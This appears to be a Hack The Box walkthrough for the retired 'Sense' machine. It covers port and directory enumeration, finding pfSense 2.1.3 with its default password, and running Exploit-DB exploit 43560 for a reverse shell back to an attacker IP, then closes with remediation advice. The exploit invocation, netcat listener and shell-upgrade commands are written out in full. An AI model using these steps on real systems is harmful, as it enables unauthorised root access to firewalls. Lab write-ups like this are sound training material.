Keep Calm and Hack The Box – An In-Depth Guide to Pwning Sense
Hack The Box (HTB) provides an excellent platform for aspiring penetration testers and cybersecurity enthusiasts to legally test and expand their ethical hacking skills. The online labs offer a wide variety of challenges that simulate real-world scenarios and vulnerabilities across different operating systems and difficulty levels.
In this walkthrough, we‘ll dive deep into exploiting Sense, a retired HTB machine that showcases the dangers of using default credentials and outdated software versions. We‘ll follow a standard penetration testing methodology and leverage open source tools like Nmap, Gobuster, and Searchsploit to compromise the system and obtain root privileges.
So fire up your Kali Linux VM and let‘s get started!
Step 1 – Reconnaissance
As with any penetration test, we begin by gathering as much information as possible about our target. A thorough recon phase is critical as it helps uncover potential attack vectors and lays the groundwork for the rest of the engagement.
Port Scanning with Nmap
Our first step is to perform an Nmap scan to identify open ports and running services on the Sense machine. Nmap is a powerful and versatile network mapping tool included in Kali Linux by default.
We‘ll run an aggressive SYN scan with OS fingerprinting, service version detection, and default NSE scripts using the following command:
nmap -A -sV -sC -p- 10.10.10.60 -oN sense_scan.txt
Here‘s a breakdown of the flags used:
- -A: Enables OS and version detection, script scanning and traceroute
- -sV: Performs service version detection
- -sC: Runs default NSE scripts
- -p-: Scans all 65,535 ports
- -oN: Saves output in normal format to sense_scan.txt
After a few minutes, Nmap should complete its scan. Let‘s analyze the results:
The scan reveals two open TCP ports:
- Port 80 (HTTP)
- Port 443 (HTTPS)
Both ports are commonly associated with web servers, so let‘s continue our enumeration efforts there.
Directory Enumeration with Gobuster
Next, we‘ll use Gobuster to brute force directories and files on the web server. Gobuster is a fast, multi-threaded tool that uses wordlists to discover hidden paths.
We‘ll scan the web server using the common.txt wordlist from the SecLists package with the following command:
gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -k
The -k flag skips SSL certificate verification, which is useful for self-signed or expired certs.
Gobuster identifies several interesting directories:
The /changelog.txt and /system-users.txt files look particularly promising. Let‘s investigate further.
Step 2 – Identifying Vulnerabilities
Navigating to https://10.10.10.60/changelog.txt in a browser reveals some juicy information:
The changelog mentions the pfSense firewall version 2.1.3 and alludes to some older vulnerabilities that were patched. However, version 2.1.3 is still quite outdated and likely has known exploits.
The /system-users.txt file is also intriguing:
It contains the username Rohit and a hint that the "password is the default pfSense password".
Armed with the pfSense version and a potential username, let‘s perform a quick Google search to find the default password.
The very first result reveals that the default username is indeed admin and the default password for pfSense is pfsense.
We have enough information now to search for applicable exploits and plan our initial foothold.
Step 3 – Searching for Exploits
To find existing exploits for pfSense 2.1.3, we‘ll consult Exploit-DB using the Searchsploit tool.
searchsploit pfsense 2.1.3
There are quite a few results, but the "pfSense < 2.1.4 – ‘status_rrd_graph_img.php‘ Command Injection" exploit immediately stands out. According to the description, it allows remote code execution as root!
Let‘s examine the exploit details:
searchsploit -x 43560
The exploit appears to be written in Python and requires the following arguments:
- RHOST: Remote host to connect to
- LHOST: Local host to connect back to
- LPORT: Local port to connect back to
- Username and password for pfSense authentication
We have all the information needed to attempt exploitation.
Step 4 – Gaining Initial Access
Let‘s copy the Python exploit to our working directory:
searchsploit -m 43560
Reviewing the exploit code, we see it performs the following high-level steps:
- Authenticate to the pfSense web interface using the provided credentials
- Inject a PHP command injection payload into a vulnerable GET parameter
- Execute a Python reverse shell back to our attack machine
Before running the exploit, let‘s set up a netcat listener to catch the incoming shell:
nc -nvlp 443
We‘ll use port 443 to hide the malicious traffic in with the ordinary HTTPS connections.
Now let‘s trigger the exploit and obtain remote code execution on Sense!
python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.28 --lport 443 --username rohit --password pfsense
Success! We received a callback on our netcat listener and now have a low-privilege shell on Sense. We can upgrade to a full TTY shell using Python as follows:
python -c ‘import pty;pty.spawn("/bin/bash")‘
Step 5 – Privilege Escalation to root
We‘ll perform some manual post-exploitation enumeration to search for quick privilege escalation vectors.
Current user and permissions:
whoami && id
Our current shell is running as the root user! No privilege escalation is necessary. We can simply read the user and root flags from their usual locations:
cat /home/rohit/user.txt
cat /root/root.txt
Congratulations, we now have complete control over the Sense machine!
Lessons Learned and Remediations
The Sense box teaches us several valuable lessons about common security misconfigurations and vulnerabilities:
-
Default credentials – Many systems and applications come with default usernames and passwords to aid in initial setup. However, it is critical that these default credentials are changed before deploying to production. Leaving default passwords is akin to locking your front door but placing the key under the doormat.
-
Outdated and unpatched software – pfSense version 2.1.3 was released in 2015 and contains multiple vulnerabilities that have since been patched in later versions. Organizations must have an effective patch management program to identify and remediate known vulnerabilities in a timely manner. Tools like Nessus can help automate much of this process.
-
Overly permissive firewall rules – pfSense is a firewall, yet access to the web interface was allowed from any IP address. Network filtering should be configured based on the principle of least privilege – only allow the bare minimum required access. At the very least, the web interface should have been restricted to internal IP ranges only.
-
Lack of network segmentation – There was no separation between the web interface and the internal pfSense management network. Sensitive management interfaces should always be placed in isolated network segments and VLANs separate from user workstations and untrusted networks. Jumpboxes and strong authentication should be required for administrative access.
I hope you enjoyed this deep dive into attacking and exploiting the Sense machine on Hack The Box. The key takeaways are to always change default passwords, keep systems patched and up-to-date, enforce the principle of least privilege, and implement network segmentation between untrusted and trusted zones.
As aspiring ethical hackers and penetration testers, we must strive to think like real-world adversaries and be thorough in our approach. There is no better way to build these critical skills than by continuously learning and practicing on new targets.
Stay curious, keep calm, and hack all the boxes!
Additional Resources
– Hack The Box: https://www.hackthebox.eu/
– pfSense Documentation: https://docs.netgate.com/pfsense/en/latest/
– OWASP Top 10: https://owasp.org/www-project-top-ten/
– Offensive Security Certified Professional (OSCP): https://www.offensive-security.com/pwk-oscp/